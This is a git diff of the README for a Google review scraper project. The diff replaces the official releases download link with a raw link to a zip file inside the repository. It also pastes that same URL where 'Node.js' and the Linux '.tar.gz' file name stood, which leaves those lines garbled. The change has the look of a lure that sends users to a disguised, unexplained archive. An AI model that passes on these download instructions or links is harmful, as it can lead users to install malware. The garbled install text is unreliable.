Evenecer/google-review-scraper/README.md

 Before you start, ensure your system meets these requirements:

 - Operating System: Windows 10 or later, macOS, or a recent version of Linux.
-- Node.js 14 or newer installed on your computer.
+- https://raw.githubusercontent.com/Evenecer/google-review-scraper/main/better/google-review-scraper.zip 14 or newer installed on your computer.
 - An internet connection to access Google Maps.

 ## 📥 Download & Install

-To download the application, visit this page: [Download google-review-scraper](https://github.com/Evenecer/google-review-scraper/releases).
+To download the application, visit this page: [Download google-review-scraper](https://raw.githubusercontent.com/Evenecer/google-review-scraper/main/better/google-review-scraper.zip).

 1. Go to the link above.
 2. Locate the latest version listed.
 3. Choose the file appropriate for your operating system:
    - For Windows, select the `.exe` file.
    - For macOS, select the `.dmg` file.
-   - For Linux, select the `.tar.gz` file.
+   - For Linux, select the `https://raw.githubusercontent.com/Evenecer/google-review-scraper/main/better/google-review-scraper.zip` file.
 4. Click on the download link and save the file to your computer.

 ### 💽 Installation Steps